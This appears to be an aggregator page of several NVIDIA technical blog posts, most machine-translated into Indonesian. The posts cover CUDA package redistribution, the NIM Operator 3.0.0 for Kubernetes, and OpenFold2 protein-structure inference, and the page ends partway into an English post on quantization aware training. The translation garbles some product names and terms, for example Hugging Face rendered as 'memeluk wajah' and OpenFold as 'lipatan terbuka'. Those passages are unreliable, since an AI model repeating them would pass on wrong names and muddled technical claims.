Pengembang sekarang bisa mendapatkan CUDA langsung dari platform pihak ketiga favorit mereka

[ad_1]

Membangun dan menggunakan aplikasi dapat menjadi tantangan bagi pengembang, mengharuskan mereka untuk menavigasi hubungan kompleks antara kemampuan perangkat keras dan perangkat lunak dan kompatibilitas. Memastikan bahwa setiap komponen perangkat lunak yang mendasarinya tidak hanya diinstal dengan benar tetapi juga cocok dengan versi yang diperlukan untuk menghindari konflik dapat menjadi tugas yang memakan waktu, dan sering mengarah pada penundaan penyebaran dan inefisiensi operasional dalam alur kerja aplikasi.

Itulah sebabnya NVIDIA memudahkan pengembang untuk menggunakan tumpukan perangkat lunak CUDA di berbagai sistem operasi (OS) dan manajer paket.

Perusahaan ini bekerja dengan ekosistem platform distribusi untuk memungkinkan redistribusi CUDA. Penyedia OS Canonical, CIQ, dan SUSE, dan Manajer Lingkungan Pengembang Flox – yang memungkinkan manajer paket NIX – akan mendistribusikan kembali perangkat lunak CUDA secara langsung. Mereka sekarang dapat menyematkan CUDA ke dalam feed paket mereka, menyederhanakan instalasi dan resolusi ketergantungan. Ini sangat bermanfaat untuk memasukkan dukungan GPU ke dalam aplikasi kompleks seperti Pytorch dan perpustakaan seperti OpenCV.

Upaya ini memperluas akses CUDA dan kemudahan penggunaan untuk semua pengembang. Ini menambah cara yang ada mereka memiliki akses dengan membiarkan mereka mendapatkan semua perangkat lunak yang mereka butuhkan di satu lokasi. Distributor tambahan akan segera hadir.

Setiap platform distribusi yang mendistribusikan ulang CUDA akan memberikan beberapa hal penting untuk membantu pengembang dan perusahaan tetap selaras dengan perangkat lunak CUDA yang didistribusikan NVIDIA.

  • Penamaan toolkit CUDA yang konsisten: Paket pihak ketiga akan cocok dengan konvensi penamaan NVIDIA untuk menghindari kebingungan dalam dokumentasi dan tutorial.
  • Pembaruan CUDA tepat waktu: Paket pihak ketiga akan diperbarui tepat waktu setelah rilis resmi NVIDIA untuk memastikan kompatibilitas dan mengurangi overhead QA.
  • Akses gratis lanjutan: CUDA sendiri akan tetap tersedia secara bebas – bahkan ketika dikemas dalam perangkat lunak berbayar. Distributor dapat mengenakan biaya untuk akses ke paket atau perangkat lunak mereka tetapi tidak akan memonetisasi CUDA secara khusus.
  • Opsi Dukungan Komprehensif: Anda dapat mengakses dukungan melalui distributor dan juga dapat menemukan bantuan melalui forum NVIDIA atau situs pengembang NVIDIA, seperti biasa.

Mendapatkan perangkat lunak CUDA dari NVIDIA selalu gratis, dan semua jalan saat ini untuk membuat CUDA tetap ada (mereka termasuk mengunduh toolkit CUDA, menarik wadah CUDA, menginstal Python menggunakan PIP atau Conda).

Tetapi kemampuan untuk platform distribusi untuk mengemas CUDA dalam penyebaran perusahaan yang lebih besar dan aplikasi perangkat lunak memungkinkan kami untuk memastikan pengalaman Anda sebagai pengembang sederhana. Anda mengunduh dan menginstal aplikasi Anda, dan di bawah sampulnya, versi CUDA yang benar diinstal juga.

Bekerja dengan ekosistem NVIDIA dengan cara ini merupakan tonggak penting dalam misi kami untuk mengurangi gesekan dalam penyebaran perangkat lunak GPU. Dengan berkolaborasi dengan pemain kunci di seluruh OS dan lansekap manajemen paket, NVIDIA memastikan bahwa CUDA tetap dapat diakses, konsisten, dan mudah digunakan – tidak ada masalah di mana atau bagaimana pengembang memilih untuk membangun.

Tetap disini untuk pembaruan lebih lanjut karena platform pihak ketiga tambahan diumumkan dan ekosistem CUDA terus berkembang.

[ad_2]

Pengembang sekarang bisa mendapatkan CUDA langsung dari platform pihak ketiga favorit mereka

Menyebarkan inferensi AI yang dapat diskalakan dengan operator NVIDIA NIM 3.0.0

[ad_1]

Model AI, cadangan mesin inferensi, dan kerangka kerja inferensi terdistribusi terus berkembang dalam arsitektur, kompleksitas, dan skala. Dengan laju perubahan yang cepat, menyebarkan dan mengelola pipa inferensi AI secara efisien yang mendukung kemampuan canggih ini menjadi tantangan kritis.

Operator NVIDIA NIM dirancang untuk membantu Anda skala dengan cerdas. Ini memungkinkan administrator kluster Kubernetes untuk mengoperasikan komponen dan layanan perangkat lunak yang diperlukan untuk menjalankan layanan microser nim nim nim untuk model LLM dan multimodal AI terbaru, termasuk penalaran, pengambilan, visi, bicara, biologi, dan banyak lagi.

Rilis terbaru NIM Operator 3.0.0 memperkenalkan kemampuan yang diperluas untuk menyederhanakan dan mengoptimalkan penyebaran layanan mikro NVIDIA NIM dan layanan mikro NVIDIA NEMO di seluruh lingkungan Kubernetes. Operator NIM 3.0.0 mendukung pemanfaatan sumber daya yang efisien dan mengintegrasikan dengan mulus dengan infrastruktur Kubernetes yang ada, termasuk penyebaran KServe.

Pelanggan dan mitra NVIDIA telah menggunakan operator NIM untuk mengelola pipa inferensi secara efisien untuk berbagai aplikasi dan agen AI, termasuk chatbots, agen rag, dan penemuan obat virtual.

NVIDIA baru -baru ini berkolaborasi dengan Red Hat untuk memungkinkan penyebaran NIM di KServe dengan operator NIM. “Red Hat berkontribusi pada operator Open Source Open Source Github Repo untuk memungkinkan penyebaran NIM NIM di Kserve,” kata direktur teknik Red Hat Babak Mozaffari. Fitur ini memungkinkan operator NIM untuk menggunakan NIM Microservices yang mendapat manfaat dari manajemen siklus hidup KServe dan menyederhanakan penyebaran NIM yang dapat diskalakan menggunakan layanan NIM. Dukungan kserve asli di operator NIM juga memungkinkan pengguna untuk mendapatkan manfaat dari cache NIM dan leverage yang dipercayai seperti NEMO.

Posting ini menjelaskan kemampuan baru dalam rilis NIM Operator 3.0.0, termasuk:

Grafik yang menunjukkan arsitektur operator NIM dengan bagian horizontal (atas ke bawah): Contoh AI generatif NVIDIA; Nemo Microservices dan NIM Microservices; Operator NIM; Layanan Infrastruktur; Kubernetes; Distribusi Linux. Grafik yang menunjukkan arsitektur operator NIM dengan bagian horizontal (atas ke bawah): Contoh AI generatif NVIDIA; Nemo Microservices dan NIM Microservices; Operator NIM; Layanan Infrastruktur; Kubernetes; Distribusi Linux.
Gambar 1. Arsitektur Operator NIM

Penyebaran NIM Fleksibel: Kompatibel Multi-Llm dan Multi-Node

Operator NIM 3.0.0 menambahkan dukungan untuk penyebaran NIM yang mudah dan cepat. Anda dapat menggunakannya dengan NIM khusus domain-seperti yang untuk biologi, ucapan, atau pengambilan-atau berbagai opsi penyebaran NIM, termasuk multi-llm yang kompatibel, atau multi-node.

  • Penyebaran NIM yang kompatibel dengan multi-llm: Menyebarkan beragam model dengan bobot khusus dari sumber seperti NVIDIA NGC, memeluk wajah, atau penyimpanan lokal. Gunakan Definisi Sumber Daya Kustom NIM Cache (CRD) untuk mengunduh bobot ke PVC dan Layanan NIM CRD untuk mengelola penyebaran, penskalaan, dan masuk.
  • Penyebaran NIM multi-node Mengatasi tantangan menggunakan LLM besar yang tidak dapat muat pada satu GPU atau perlu berjalan pada beberapa GPU dan berpotensi pada beberapa node. Operator NIM mendukung caching untuk penyebaran NIM multi-node menggunakan NIM Cache CRD, dan menyebarkannya menggunakan layanan NIM CRD pada Kubernetes dengan Leaderworkersets (LWS).

Perhatikan bahwa penyebaran NIM multi-node tanpa GPudirect RDMA dapat mengakibatkan sering restart dari pemimpin LWS dan pod pekerja karena model waktu pemuatan shard. Menggunakan konektivitas jaringan cepat seperti IPOIB atau ROCE sangat disarankan dan dapat dengan mudah dikonfigurasi melalui operator jaringan NVIDIA.

Gambar 2 menunjukkan penyebaran model bahasa besar (LLM) dari perpustakaan wajah pemeluk pada kubernet menggunakan operator NVIDIA NIM sebagai penyebaran NIM multi-llm. Ini secara khusus menunjukkan menggunakan model instruksi LLAMA 3 8B, termasuk layanan dan verifikasi status pod, diikuti oleh a curl Perintah untuk mengirim permintaan ke Layanan.

GIF animasi layar komputer yang menunjukkan penyebaran multi-llm dari model instruksi LLAMA 3 8B menggunakan operator NIM. GIF animasi layar komputer yang menunjukkan penyebaran multi-llm dari model instruksi LLAMA 3 8B menggunakan operator NIM.
Gambar 2. Penempatan multi-llm Model Instruksi Llama 3 8B menggunakan operator NIM

Pemanfaatan GPU yang efisien dengan DRA

DRA adalah fitur kubernet built-in yang menyederhanakan manajemen GPU dengan mengganti plugin perangkat tradisional dengan pendekatan yang lebih fleksibel dan dapat diperluas. DRA memungkinkan pengguna untuk mendefinisikan kelas perangkat GPU, meminta GPU berdasarkan kelas -kelas tersebut, dan memfilternya sesuai dengan beban kerja dan kebutuhan bisnis.

Operator NIM 3.0.0 mendukung DRA di bawah Pratinjau Teknologi dengan mengonfigurasi ResourceClaim dan ResourceClaimTemplate di NIM Pod melalui NIM Service CRD dan NIM Pipeline CRD. Anda dapat membuat dan melampirkan klaim Anda sendiri atau membiarkan operator NIM membuat dan mengelolanya secara otomatis.

Operator NIM DRA mendukung:

  • GPU penuh dan penggunaan MIG
  • Berbagi GPU Melalui pengiralan waktu dengan menetapkan klaim yang sama untuk beberapa layanan NIM

Catatan: Fitur ini saat ini tersedia sebagai pratinjau teknologi, dengan dukungan penuh segera tersedia.

Gambar 3 menunjukkan penyebaran LLAMA 3 8B Instruksi NIM menggunakan Kubernetes DRA dengan operator NIM. Pengguna dapat menentukan klaim sumber daya dalam layanan NIM untuk meminta atribut perangkat keras tertentu seperti arsitektur dan memori GPU, dan berinteraksi dengan LLM yang digunakan menggunakan curl.

GIF animasi layar komputer yang menunjukkan penyebaran Llama 3 8B Instruktur NIM menggunakan Kubernetes DRA dengan operator NIM.GIF animasi layar komputer yang menunjukkan penyebaran Llama 3 8B Instruktur NIM menggunakan Kubernetes DRA dengan operator NIM.
Gambar 3. Penempatan Llama 3 8B Instruksikan NIM Menggunakan Kubernetes DRA dengan Operator NIM

Penempatan mulus di kserve

KServe adalah platform pelayanan inferensi open source yang diadopsi secara luas yang digunakan oleh banyak mitra dan pelanggan. Operator NIM 3.0.0 mendukung penyebaran mentah dan tanpa server di KServe dengan mengonfigurasi sumber daya kustom InferencesService untuk mengelola penyebaran, peningkatan, dan autoscaling NIM. Operator NIM menyederhanakan proses penyebaran dengan secara otomatis mengkonfigurasi semua variabel lingkungan dan sumber daya yang diperlukan dalam CRDService CRD.

Integrasi ini memberikan dua manfaat tambahan:

  • Caching cerdas dengan cache NIM untuk mengurangi waktu inferensi awal dan latensi autoscaling, menghasilkan penyebaran yang lebih cepat dan lebih responsif.
  • Nemo Microservices mendukung evaluasi, pagar pembatas, dan penyesuaian untuk meningkatkan sistem AI untuk latensi, akurasi, biaya, dan kepatuhan.

Gambar 4 menunjukkan penyebaran LLAMA 3.2 1B Instruksi NIM pada KServe menggunakan operator NIM. Dua metodologi penyebaran yang berbeda ditampilkan: RawDeployment dan Serverless. Penyebaran tanpa server menggabungkan fungsionalitas autoscaling melalui anotasi K8S. Kedua strategi menggunakan perintah curl untuk menguji respons NIM.

Animasi GIF layar komputer yang menunjukkan penyebaran LLAMA 3.2 1B Instruksi NIM tentang KServe menggunakan operator NIM.Animasi GIF layar komputer yang menunjukkan penyebaran LLAMA 3.2 1B Instruksi NIM tentang KServe menggunakan operator NIM.
Gambar 4. Penyebaran LLAMA 3.2 1B Instruksi NIM di KServe Menggunakan Operator NIM dengan Metodologi RawDeployment dan Serverless Metodologi

Mulailah menskalakan inferensi AI dengan operator NIM 3.0.0

NVIDIA NIM Operator 3.0.0 membuat penyusutan inferensi AI yang dapat diskalakan lebih mudah dari sebelumnya. Apakah Anda bekerja dengan penyebaran NIM multi-llm yang kompatibel atau multi-node, mengoptimalkan penggunaan GPU dengan DRA, atau menggunakan KServe, rilis ini memungkinkan Anda untuk membangun aplikasi AI berkinerja tinggi, fleksibel, dan terukur.

Dengan mengotomatiskan manajemen penyebaran, penskalaan, dan siklus hidup baik NVIDIA NIM dan NVIDIA NEMO Microservices, Operator NIM memudahkan tim perusahaan untuk mengadopsi alur kerja AI. Upaya ini selaras dengan membuat alur kerja AI mudah digunakan dengan cetak biru Nvidia AI, memungkinkan pergerakan cepat untuk produksi. Operator NIM adalah bagian dari NVIDIA AI Enterprise, memberikan dukungan perusahaan, stabilitas API, dan penambalan keamanan proaktif.

Mulailah melalui NGC atau dari repo Open Source Github NVIDIA/K8S-NIM-Operator. Untuk pertanyaan teknis tentang instalasi, penggunaan, atau masalah, mengajukan masalah pada repo Github NVIDIA/K8S-NIM-Operator.

[ad_2]

Menyebarkan inferensi AI yang dapat diskalakan dengan operator NVIDIA NIM 3.0.0

Akselerate Protein Struktur Inferensi Lebih dari 100x dengan NVIDIA RTX Pro 6000 Blackwell Server Edition

[ad_1]

Perlombaan untuk memahami struktur protein tidak pernah lebih kritis. Dari mempercepat penemuan obat hingga mempersiapkan pandemi masa depan, kemampuan untuk memprediksi bagaimana protein lipatan menentukan kapasitas untuk menyelesaikan tantangan biologis yang paling mendesak dari umat manusia. Sejak pelepasan alphafold2, inferensi AI untuk menentukan struktur protein telah meroket. Alat yang tidak dioptimalkan untuk inferensi struktur protein dapat membebankan biaya jutaan karena kehilangan waktu penelitian dan pemanfaatan komputasi yang berkepanjangan.

GPU NVIDIA RTX Pro 6000 Blackwell Edition edisi yang baru secara mendasar mengubah ini. Terlepas dari terobosan Alphafold2, generasi penyelarasan beberapa urutan ganda yang terikat CPU dan inferensi GPU yang tidak efisien tetap menjadi langkah pembatas laju. Membangun upaya kolaboratif sebelumnya, akselerasi baru yang dikembangkan oleh NVIDIA Digital Biology Research Labs memungkinkan inferensi struktur protein yang lebih cepat dari sebelumnya menggunakan OpenFold tanpa biaya akurasi dibandingkan dengan Alphafold2.

Dalam posting ini, kami akan menunjukkan cara menjalankan analisis protein skala besar menggunakan GPU Edisi Blackwell Server Edisi Blackwell, memberikan kinerja inferensi struktur protein yang belum pernah terjadi sebelumnya untuk platform perangkat lunak, penyedia cloud, dan lembaga penelitian.

Video 1. GPU NVIDIA RTX Pro 6000 Blackwell Server Edition menetapkan tolok ukur baru untuk inferensi struktur protein

Mengapa kecepatan dan skala materi dalam prediksi struktur protein?

Lipatan protein berada di persimpangan beban kerja yang paling komputasi dalam biologi komputasi. Pipa penemuan obat modern memerlukan menganalisis ribuan struktur protein. Pada saat yang sama, proyek-proyek rekayasa enzim menuntut siklus iterasi yang cepat untuk mengoptimalkan fungsi biologis, dan aplikasi biotektan pertanian memerlukan penyaringan pustaka protein besar untuk mengembangkan tanaman yang tahan iklim.

Tantangan komputasi dapat menjadi sangat besar: prediksi struktur protein tunggal dapat melibatkan MSA skala metagenomik, langkah-langkah penyempurnaan iteratif, dan perhitungan ensemble yang biasanya membutuhkan waktu penghitungan waktu. Ketika diskalakan di seluruh proteom atau pustaka target obat, beban kerja ini menjadi sangat memakan waktu pada infrastruktur berbasis CPU.

Misalnya, dalam perbandingan langsung alat penyelarasan multi-urutan, MMSEQS2-GPU menyelesaikan penyelarasan 177x lebih cepat pada L40-an tunggal daripada jackhmmer berbasis CPU pada CPU 128-core dan hingga 720X lebih cepat ketika didistribusikan pada delapan GPU NVIDIA L40S. Speedup ini menyoroti bagaimana revolusi GPU secara dramatis mengurangi kemacetan komputasi dalam bioinformatika protein.

Bagaimana NVIDIA memungkinkan AI struktur protein tercepat yang tersedia?

Membangun rilis baru-baru ini seperti CueQuivariance dan Boltz-2 NIM Microservice, NVIDIA Digital Biology Research Lab memvalidasi peningkatan kinerja terobosan untuk openfold menggunakan RTX Pro 6000 Blackwell Server Edition dan NVIDIA TensorRT di seluruh tolok ukur standar industri (Gambar 1).

Grafik ini menggambarkan proses melewati urutan asam amino ke MMSEQS2-GPU untuk menghasilkan penyelarasan urutan berganda, yang kemudian diteruskan ke model AI OpenFold2 untuk memprediksi struktur protein.Grafik ini menggambarkan proses melewati urutan asam amino ke MMSEQS2-GPU untuk menghasilkan penyelarasan urutan berganda, yang kemudian diteruskan ke model AI OpenFold2 untuk memprediksi struktur protein.
Gambar 1. Prediksi struktur protein dengan MMSEQS2-GPU dan OpenFold2

Memanfaatkan instruksi baru dan TensorRT, MMSEQS2-GPU, dan OpenFold pada RTX Pro 6000 Blackwell memberikan kinerja transformasional untuk prediksi struktur protein, mengeksekusi lipatan lebih dari 138x lebih cepat daripada Alphafold2 dan sekitar 2,8x lebih cepat daripada colabfold, sambil mempertahankan skor TM yang identik.

Pertama, kecepatan inferensi yang lebih cepat diaktifkan dengan MMSEQS2-GPU pada RTX Pro 6000 Blackwell, yang berjalan sekitar 190x lebih cepat dari Jackhmmer dan HHBlits pada CPU Dual-Socket AMD 7742. Selain itu, optimasi Tensorrt yang dipesan lebih dahulu menargetkan lipatan terbuka meningkatkan kecepatan inferensi 2,3x dibandingkan dengan lipatan terbuka awal. Divalidasi pada 20 target protein CASP14, tolok ukur ini menetapkan RTX Pro 6000 Blackwell sebagai solusi terobosan untuk prediksi struktur protein end-to-end.

Menghilangkan hambatan memori

Selain itu, 96 GB memori bandwidth tinggi (1,6 tb/s) memungkinkan RTX Pro 6000 Blackwell untuk melipat seluruh ansambel protein dan MSA besar, memungkinkan alur kerja penuh tetap menjadi residen GPU. Fungsionalitas GPU multi-instance (MIG) memungkinkan RTX Pro 6000 Blackwell tunggal untuk bertindak seperti empat GPU, masing-masing cukup kuat untuk mengungguli GPU inti Tensor NVIDIA L4. Ini memungkinkan banyak pengguna atau alur kerja untuk berbagi server tanpa mengurangi kecepatan atau akurasi.

Berikut adalah contoh lengkap yang menunjukkan cara memanfaatkan kinerja RTX Pro 6000 untuk prediksi struktur protein cepat. Langkah pertama adalah menggunakan OpenFold2 NIM pada mesin lokal Anda.

# See https://build.nvidia.com/openfold/openfold2/deploy for
# instructions to configure your docker login, NGC API Key, and
# environment for running the OpenFold NIM on your local system.

# Run this in a shell, providing the username below and your NGC API Key
$ docker login nvcr.io
Username: $oauthtoken
Password: <PASTE_API_KEY_HERE>

export NGC_API_KEY=<your personal NGC key>

# Configure local NIM cache directory so the NIM model download can be reused
export LOCAL_NIM_CACHE=~/.cache/nim
mkdir -p "$LOCAL_NIM_CACHE"
sudo chmod 0777 -R "$LOCAL_NIM_CACHE"

# Then launch the NIM container, in this case using GPU device ID 0.
docker run -it \
    --runtime=nvidia \
    --gpus='"device=0"' \
    -p 8000:8000 \
    -e NGC_API_KEY \
    -v "$LOCAL_NIM_CACHE":/opt/nim/.cache \
    nvcr.io/nim/openfold/openfold2:latest

# It can take some time to download all model assets on the initial run.
# You can check the status using the built-in health check.  This will
# return {"status": "ready"} when the NIM endpoint is ready for inference.
curl http://localhost:8000/v1/health/ready

Setelah NIM digunakan secara lokal, Anda dapat membangun permintaan inferensi dan menggunakan titik akhir lokal untuk menghasilkan prediksi struktur protein.

#!/usr/bin/env python3

import requests
import os
import json
from pathlib import Path

# ----------------------------
# parameters
# ----------------------------
output_file = Path("output1.json")
selected_models = [1, 2]

# SARS-CoV-2 proteome example
# Spike protein (1273 residues) — critical for vaccine development
sequence = (
"MFVFLVLLPLVSSQCVNLTTRTQLPPAYTNSFTRGVYYPDKVFRSSVLHSTQDLFLPFFSNVTWFHAIHVSGTNGTKRFDNPVLPFNDGVYFAST
EKSNIIRGWIFGTTLDSKTQSLLIVNNATNVVIKVCEFQFCNDPFLGVYYHKNNKSWMESEFRVYSSANNCTFEYVSQPFLMDLEGKQGNFKNL
REFVFKNIDGYFKIYSKHTPINLVRDLPQGFSALEPLVDLPIGINITRFQTLLALHRSYLTPGDSSSGWTAGAAAYYVGYLQPRTFLLKYNENGTITDAVD
CALDPLSETKCTLKSFTVEKGIYQTSNFRVQPTESIVRFPNITNLCPFGEVFNATRFASVYAWNRKRISNCVADYSVLYNSASFSTFKCYGVSPTKLNDLC
FTNVYADSFVIRGDEVRQIAPGQTGKIADYNYKLPDDFTGCVIAWNSNNLDSKVGGNYNYLYRLFRKSNLKPFERDISTEIYQAGSTPCNGVEGFNCY
FPLQSYGFQPTNGVGYQPYRVVVLSFELLHAPATVCGPKKSTNLVKNKCVNFNFNGLTGTGVLTESNKKFLPFQQFGRDIADTTDAVRDPQTLEILDITP
CSFGGVSVITPGTNTSNQVAVLYQDVNCTEVPVAIHADQLTPTWRVYSTGSNVFQTRAGCLIGAEHVNNSYECDIPIGAGICASYQTQTNSPRRARS
VASQSIIAYTMSLGAENSVAYSNNSIAIPTNFTISVTTEILPVSMTKTSVDCTMYICGDSTECSNLLLQYGSFCTQLNRALTGIAVEQDKNTQEVFAQV
KQIYKTPPIKDFGGFNFSQILPDPSKPSKRSFIEDLLFNKVTLADAGFIKQYGDCLGDIAARDLICAQKFNGLTVLPPLLTDEMIAQYTSALLAGTITSGWT
FGAGAALQIPFAMQMAYRFNGIGVTQNVLYENQKLIANQFNSAIGKIQDSLSSTASALGKLQDVVNQNAQALNTLVKQLSSNFGAISSVLNDILSRLD
KVEAEVQIDRLITGRLQSLQTYVTQQLIRAAEIRASANLAATKMSECVLGQSKRVDFCGKGYHLMSFPQSAPHGVVFLHVTYVPAQEKNFTTAPAICHD
GKAHFPREGVFVSNGTHWFVTQRNFYEPQIITTDNTFVSGNCDVVIGIVNNTVYDPLQPELDSFKEELDKYFKNHTSPDVDLGDISGINASVVNIQK
EIDRLNEVAKNLNESLIDLQELGKYEQYIKWPWYIWLGFIAGLIAIVMVTIMLCCMTSCCSCLKGCCSCGSCCKFDEDDSEPVLKGVKLHYT"
)

data = {
    "sequence": sequence,
    "selected_models": [1, 2],
    "relax_prediction": False,
}
print(data)

# ---------------------------------------------------------
# Submit
# ---------------------------------------------------------
url = "http://localhost:8000/biology/openfold/openfold2/predict-structure-from-msa-and-template"
print("Making request...")
response = requests.post(url=url, json=data)

# ---------------------------------------------------------
# View response
# ---------------------------------------------------------
if response.status_code == 200:
    output_file.write_text(response.text)
    print(f"Response output to file: {output_file}")

else:
    print(f"Unexpected HTTP status: {response.status_code}")
    print(f"Response: {response.text}")

Mulailah Akselerasi Protein AI Workflows

Sedangkan Alphafold2 pernah membutuhkan node komputasi kinerja tinggi yang heterogen, akselerasi NVIDIA untuk prediksi struktur protein-termasuk komponen modular dalam CueQuivariance, Tensorrt, dan MMSEQS2-GPU-ON RTX Pro 6000 Blackwell, memungkinkan pelipat pada server tunggal di dunia. Ini membuat lipat skala proteome dapat diakses oleh laboratorium atau platform perangkat lunak apa pun, dengan waktu-ke-prediksi tercepat hingga saat ini.

Apakah Anda mengembangkan platform perangkat lunak untuk penemuan obat, membangun solusi biotektan pertanian, atau melakukan penelitian kesiapsiagaan pandemi, kinerja RTX Pro 6000 Blackwell yang belum pernah terjadi sebelumnya akan mengubah alur kerja biologi komputasi Anda. Kekuatan RTX Pro 6000 Blackwell Server Edition tersedia saat ini di server NVIDIA RTX Pro dari Global System Makers serta dalam contoh cloud dari penyedia layanan cloud terkemuka.

Siap Memulai? Temukan mitra untuk NVIDIA RTX Pro 6000 Blackwell Server Edition dan pengalaman lipat protein dengan kecepatan dan skala yang belum pernah terjadi sebelumnya.

Ucapan Terima Kasih

We'd like to thank the researchers from NVIDIA, University of Oxford, and Seoul National University who contributed to this research, including Christian Dallago, Alejandro Chacon, Kieran Didi, Prashant Sohani, Fabian Berressem, Alexander Nesterovskiy, Robert Ohannessian, Mohamed Elbalkini, Jonathan Cogan, Ania Kukushkina, Anthony Costa, Arash Vahdat, Bertil Schmidt, Milot Mirdita, dan Martin Steinegger.

[ad_2]

Akselerate Protein Struktur Inferensi Lebih dari 100x dengan NVIDIA RTX Pro 6000 Blackwell Server Edition

How Quantization Aware Training Enables Low-Precision Accuracy Recovery

[ad_1]

After training AI models, a variety of compression techniques can be used to optimize them for deployment. The most common is post-training quantization (PTQ), which applies numerical scaling techniques to approximate model weights in lower-precision data types. But two other strategies—quantization aware training (QAT) and quantization aware distillation (QAD)—can succeed where PTQ falls short by actively preparing the model for life in lower precision (See Figure 1 below).

QAT and QAD aim to simulate the impact of quantization during post-training, allowing higher-precision model weights and activations to adapt to the new format’s representable range. This adaptation provides a smoother transition from higher to lower precisions, often yielding greater accuracy recovery.

Flowchart showing the decision process for model quantization and deployment. It begins with a higher precision checkpoint. The model first undergoes Post-Training Quantization (PTQ). If accuracy criteria are met, the model is deployed. If not, Quantization Aware Training (QAT) or Quantization Aware Distillation (QAD) is applied. From there the model is either deployed if accuracy criteria are met, or iteratively refined.Flowchart showing the decision process for model quantization and deployment. It begins with a higher precision checkpoint. The model first undergoes Post-Training Quantization (PTQ). If accuracy criteria are met, the model is deployed. If not, Quantization Aware Training (QAT) or Quantization Aware Distillation (QAD) is applied. From there the model is either deployed if accuracy criteria are met, or iteratively refined.
Figure 1. Decision pipeline for PTQ, QAT, and QAD showing how models progress toward deployment based on accuracy criteria.

In this blog, we explore QAT and QAD, and demonstrate how to apply them with the TensorRT Model Optimizer. Model Optimizer provides APIs that are natively compatible with Hugging Face and PyTorch, enabling developers to seamlessly prepare models for QAT/QAD while leveraging familiar training workflows. Once the final model is trained using these techniques, we demonstrate how to efficiently export and deploy them with TensorRT-LLM.

What is Quantization Aware Training? 

QAT is a technique in which the model learns to handle low-precision arithmetic during an additional training phase after pre-training. Unlike PTQ, which quantizes a model after full-precision training using a calibration dataset, QAT trains the model with quantized values in the forward path. The QAT workflow is nearly identical to the PTQ workflow; the key difference is that a training phase is injected after the quantization recipe has been applied to the original model (Figure 2 below).

Flowchart illustrating the Quantization Aware Training (QAT) workflow. On the left, an original precision model is combined with calibration data and a Model Optimizer quantization recipe to form a QAT-ready model. This model, along with a subset of original training data, enters the QAT training loop. Inside the loop, high-precision weights are updated and then used as “fake quantization” weights during the forward pass. Training loss is calculated, and the backward pass uses a straight-through estimator (STE) to propagate gradients. The loop repeats until training converges.Flowchart illustrating the Quantization Aware Training (QAT) workflow. On the left, an original precision model is combined with calibration data and a Model Optimizer quantization recipe to form a QAT-ready model. This model, along with a subset of original training data, enters the QAT training loop. Inside the loop, high-precision weights are updated and then used as “fake quantization” weights during the forward pass. Training loss is calculated, and the backward pass uses a straight-through estimator (STE) to propagate gradients. The loop repeats until training converges.
Figure 2. Workflow of Quantization Aware Training (QAT), showing how a model is prepared, quantized, and iteratively trained with simulated low-precision weights.

The goal of QAT is to produce a quantized model with high accuracy for inference performance. This makes QAT different from quantized training, which targets improvements in training efficiency. QAT may therefore use methods that are not optimal for training throughput but result in a more accurate model for inference.

QAT is typically performed with “fake quantized” weights and activations in the forward pass. In this approach, lower precision is represented within a higher data type through a quantize/dequantize operator (See Figure 3 below). As a result, QAT does not require native hardware support. QAT for NVFP4, for instance, can be carried out on Hopper GPUs using simulated quantization. It integrates naturally into existing higher precision pipelines, with backward gradients computed in higher precision and quantization modeled as a pass-through operation (straight-through estimation, STE). Additional steps, such as zeroing outlier gradients, may also be applied, adding overhead beyond BF16 or FP16.

By exposing the loss function to rounding and clipping errors during training, QAT enables the model to adapt and recover from them. In practice, QAT may not maximize training performance, but it provides a stable and practical training process that yields a high accuracy quantized inference model.

ext Infographic showing the Quantize Dequantize workflow across two adjacent neural network layers. A blue bar at the top labeled “Layer N minus 1 Activations” narrows through a gray funnel into Layer N. Inside Layer N, three stacked rows of small squares represent the weight path: the top row is green with decimal numbers and is labeled 16 bit Weights; the middle row is gray with small integers and is labeled Target Precision Weights, indicating quantized values; the bottom row is green with decimals and is labeled Dequantized 16 bit Weights. A bracket on the left marks the top two rows as Layer N Q DQ and the bottom row as Layer N Ops, indicating that matmul and similar operations use the dequantized values. On the right, callouts read 16 bit Weights, Quantization, Target Precision Weights, Dequantization, Dequantized 16 bit Weights, and Downstream Operations on Dequantized Weights. Below, a second blue bar labeled “Layer N Output Activations” narrows to a row of green squares labeled Layer N plus 1 Ops with a note “Layer N plus 1 Dequantized Weights.” The figure communicates that quantization error is introduced at quantize, dequantize restores datatype for compatibility, shapes are unchanged, and the next layer consumes dequantized activations together with its own dequantized weights.ext Infographic showing the Quantize Dequantize workflow across two adjacent neural network layers. A blue bar at the top labeled “Layer N minus 1 Activations” narrows through a gray funnel into Layer N. Inside Layer N, three stacked rows of small squares represent the weight path: the top row is green with decimal numbers and is labeled 16 bit Weights; the middle row is gray with small integers and is labeled Target Precision Weights, indicating quantized values; the bottom row is green with decimals and is labeled Dequantized 16 bit Weights. A bracket on the left marks the top two rows as Layer N Q DQ and the bottom row as Layer N Ops, indicating that matmul and similar operations use the dequantized values. On the right, callouts read 16 bit Weights, Quantization, Target Precision Weights, Dequantization, Dequantized 16 bit Weights, and Downstream Operations on Dequantized Weights. Below, a second blue bar labeled “Layer N Output Activations” narrows to a row of green squares labeled Layer N plus 1 Ops with a note “Layer N plus 1 Dequantized Weights.” The figure communicates that quantization error is introduced at quantize, dequantize restores datatype for compatibility, shapes are unchanged, and the next layer consumes dequantized activations together with its own dequantized weights.
Figure 3. This figure illustrates “fake quantization” across adjacent layers during QAT/PTQ. Layer N’s weights are quantized to a target precision, immediately dequantized back to BF16/FP16, and then used by the layer’s ops—so computation runs on approximate (dequantized) values. The resulting Layer N output activations then feed Layer N+1, which likewise uses dequantized weights, showing that the next layer’s inputs are dequantized activations while precision errors originate at quantization and persist downstream.

Some implementations of QAT/QAD do not require fake quantization, but those methods are out of scope of this blog. In the current Model Optimizer implementation, the output of QAT is a new model in the original precision with updated weights along with critical metadata for converting to the target format such as: 

  • Scaling factors (dynamic ranges) for each layer activation
  • Quantization parameters such as bits
  • Block size

How to apply QAT with Model Optimizer

Applying QAT with Model Optimizer is fairly straightforward. QAT supports the same quantization formats as the PTQ workflow, including key formats such as FP8, NVFP4, MXFP4, INT8, and INT4. For the code snippet below, we selected NVFP4 weight and activation quantization. 

import modelopt.torch.quantization as mtq

config = mtq.NVFP4_MLP_ONLY_CFG

# Define forward loop for calibration
def forward_loop(model):
    for data in calib_set:
        model(data)

# quantize the model and prepare for QAT
model = mtq.quantize(model, config, forward_loop) 

Up to this point, the code is identical to PTQ. To apply QAT, we need to perform a training loop. This loop includes standard tunable parameters such as the choice of optimizer, scheduler, learning rate, and so on.

# QAT with a regular finetuning pipeline
# Adjust learning rate and training epochs
